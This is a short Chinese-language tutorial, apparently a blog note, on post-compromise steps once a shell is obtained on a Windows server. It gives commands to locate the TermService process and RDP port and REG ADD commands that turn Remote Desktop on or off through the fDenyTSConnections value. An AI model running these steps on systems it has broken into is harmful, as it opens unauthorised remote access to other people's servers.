getshell后启动远程连接
查询服务器远程连接:
进程查询:
查询进程服务名称为TermService的进行PID号:
1 | tasklist /svc |
查询PID号对应开启的端口号:
1 | netstat -ano | find "1744" |
注册表查询:
通过以下命令查询注册表:
1 | reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" |
使用系统计算器解码:
服务器未开始远程连接:
开启远程连接命令:
1 | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f |
关闭远程连接命令:
1 | REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f |